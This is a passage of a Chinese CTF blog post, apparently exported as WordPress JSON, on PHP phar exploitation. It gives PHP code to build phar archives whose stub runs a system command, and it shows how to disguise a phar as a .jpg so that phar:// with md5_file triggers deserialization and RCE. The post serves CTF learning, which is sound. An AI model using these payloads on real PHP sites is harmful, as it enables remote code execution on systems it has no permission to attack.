data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-300x138.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-123\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"tvqlp\">\u751f\u6210phar\u6587\u4ef6<\/h4>\n\n\n\n<pre id=\"Kthsn\" class=\"wp-block-code\"><code>&lt;?php\n$phar = new Phar('exploit.phar');\n$phar-&gt;startBuffering();\n\n$stub = &lt;&lt;&lt;'STUB'\n&lt;?php\n    system('whoami');\n    __HALT_COMPILER();\n?&gt;\nSTUB;\n\n$phar-&gt;setStub($stub);\n$phar-&gt;addFromString('test.txt', 'test');\n$phar-&gt;stopBuffering();\n\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"102\" data-attachment-id=\"124\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=124\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" data-orig-size=\"790,102\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94-300x39.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-124\"  sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"WWEx8\">php\u7279\u6027<\/h4>\n\n\n\n<p id=\"ua64e6e81\">\u8be6\u7ec6\u539f\u7406\u89c1<\/p>\n\n\n\n<p><a href=\"https:\/\/fushuling.com\/index.php\/2025\/07\/30\/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web\">https:\/\/fushuling.com\/index.php\/2025\/07\/30\/%E5%BD%93include%E9%82%82%E9%80%85phar-deadsecctf2025-baby-web<\/a><\/p>\n\n\n\n<p id=\"u07e709b2\">\u5f53\u6211\u4eecinclude phar\u6587\u4ef6\u65f6\uff0cphp\u4f1a\u81ea\u52a8\u89e3\u538b\u8fd9\u4e2a\u538b\u7f29\u6587\u4ef6\uff0c\u6240\u4ee5\u6700\u540e\u76f8\u5f53\u4e8e\u662f\u76f4\u63a5include\u8fd9\u4e2aphar\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"258\" data-attachment-id=\"125\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=125\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95.png\" data-orig-size=\"1376,347\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-300x76.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-95-1024x258.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-125\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u874cd01b\">\u6211\u4eec\u5b8c\u5168\u4e0d\u9700\u8981\u4fdd\u8bc1\u6700\u540einclude\u7684\u662f\u4e00\u4e2axxx.phar.gzip\u6587\u4ef6\uff0c\u53ea\u8981\u6587\u4ef6\u540d\u91cc\u6709.phar\u5373\u53ef\uff0c\u6240\u4ee5\u8bf4\u65e0\u8bba\u6211\u4eec\u662finclude 1.phar.png\u8fd8\u662f1.phar.html\u5747\u53ef\u4ee5\u6b63\u5e38rce<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"280\" data-attachment-id=\"126\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=126\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96.png\" data-orig-size=\"1475,403\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-96-1024x280.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-126\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubd51d211\">\u751a\u81f3\u53ea\u8981\u5305\u542b\u7684\u8def\u5f84\u91cc\u5e26\u4e86.phar\u8fd9\u51e0\u4e2a\u5b57\u5c31\u80fd\u89e3\u6790 \u54ea\u6015\u662f\u76ee\u5f55\u4e5f\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"276\" data-attachment-id=\"127\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=127\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97.png\" data-orig-size=\"1410,380\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-300x81.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-97-1024x276.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-127\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"GTNem\">Phar\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u539f\u7406<\/h4>\n\n\n\n<p id=\"u5e1cbccc\"><code>manifest<\/code>\u538b\u7f29\u6587\u4ef6\u7684\u5c5e\u6027\u7b49\u4fe1\u606f\uff0c\u4ee5\u5e8f\u5217\u5316\u5b58\u50a8\uff0c\u5b58\u5728\u4e00\u6bb5\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32<\/p>\n\n\n\n<p id=\"u469cbf13\">\u8c03\u7528<code>phar<\/code>\u4f2a\u534f\u8bae\uff0c\u53ef\u8bfb\u53d6<code>.phar<\/code>\u6587\u4ef6<\/p>\n\n\n\n<p id=\"u38b7acc8\"><code>phar<\/code>\u534f\u8bae\u89e3\u6790\u6587\u4ef6\u65f6\uff0c\u4f1a\u81ea\u52a8\u89e6\u53d1\u5bf9<code>manifest<\/code>\u5b57\u6bb5\u7684\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u8fdb\u884c\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<p id=\"u9a2cd0a3\"><code>phar<\/code>\u9700\u8981\u6ee1\u8db3 PHP &gt;= 5.2\uff0c\u5728<code>php.ini<\/code>\u4e2d\u5c06<code>phar.readonly<\/code>\u8bbe\u4e3a<code>Off<\/code><\/p>\n\n\n\n<p id=\"uceae5a48\">\u4ee5\u4e0b\u662f\u8fd9\u4e2a\u6f0f\u6d1e\u53d7\u5230\u5f71\u54cd\u7684\u51fd\u6570\uff08\u5373\u53ef\u4ee5\u4f7f\u7528<code>phar<\/code>\u4f2a\u534f\u8bae\u8bfb\u53d6<code>.phar<\/code>\u6587\u4ef6\u7684\u51fd\u6570\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"328\" data-attachment-id=\"128\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=128\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98.png\" data-orig-size=\"1278,409\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-300x96.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-98-1024x328.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-128\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"gDugm\">\u4f8b\u9898<\/h5>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"711\" height=\"396\" data-attachment-id=\"129\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=129\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" data-orig-size=\"711,396\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99-300x167.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-99.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-129\"  sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"566\" height=\"85\" data-attachment-id=\"130\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=130\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" data-orig-size=\"566,85\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100-300x45.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-100.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-130\"  sizes=\"auto, (max-width: 566px) 100vw, 566px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uaf2960d7\">\u8fd9\u9053\u9898md5_file()\u51fd\u6570\u914d\u5408phar:\/\/\u4f2a\u534f\u8bae\u53ef\u4ee5\u89e6\u53d1\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n<p id=\"u195e5d83\">\u5e76\u4e14upload.php\u53ef\u4ee5\u4e0a\u4f20\u56fe\u7247\u6587\u4ef6<\/p>\n\n\n\n<p id=\"u3c0a67eb\">\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u5229\u7528\u4e4b\u524d\u63d0\u8fc7\u7684php\u7279\u6027<\/p>\n\n\n\n<p id=\"u203cc5cc\">\u5c06.phar\u6587\u4ef6\u91cd\u547d\u540d\u4e3a.jpg \u4f7f\u7528phar:\/\/\u534f\u8bae\u65f6\u4ecd\u4f1a\u8bc6\u522b\u4e3aphar\u6587\u4ef6<\/p>\n\n\n\n<pre id=\"LkjoM\" class=\"wp-block-code\"><code>&lt;?php\nclass TestObject {\n}\n$phar = new Phar('exploit.phar.jpg');\n$phar-&gt;startBuffering();\n$phar-&gt;setStub('&lt;?php __HALT_COMPILER(); ?&gt;');\n$obj = new TestObject();\n$phar-&gt;setMetadata($obj);\n$phar-&gt;addFromString('test.txt', 'text');\n$phar-&gt;stopBuffering();\n?&gt;<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"226\" data-attachment-id=\"131\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=131\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" data-orig-size=\"823,226\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-101.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-131\"  sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"226\" data-attachment-id=\"132\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=132\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" data-orig-size=\"823,226\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102-300x82.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-102.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-132\"  sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7c7b\u4e0e\u5bf9\u8c61 php\u9762\u5411\u5bf9\u8c61\u5f00\u53d1\u7684\u5185\u5bb9 \u7c7b \u2212 \u5b9a\u4e49\u4e86\u4e00\u4ef6\u4e8b\u7269\u7684\u62bd\u8c61\u7279\u70b9\u3002\u7c7b\u7684\u5b9a\u4e49\u5305\u542b\u4e86\u6570\u636e\u7684\u5f62\u5f0f\u4ee5\u53ca\u5bf9\u6570\u636e\u7684\u64cd\u4f5c [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":133,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[9,5],"class_list":["post-67","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ctf","tag-php","tag-5"],"jetpack_featured_media_url":"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/36eac309685be1c9a7ef882be99d663f7c9fe353.webp","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=67"}],"version-history":[{"count":1,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67\/revisions"}],"predecessor-version":[{"id":137,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/67\/revisions\/137"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=\/wp\/v2\/media\/133"}],"wp:attachment":[{"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=67"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=67"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zhihao.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=67"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}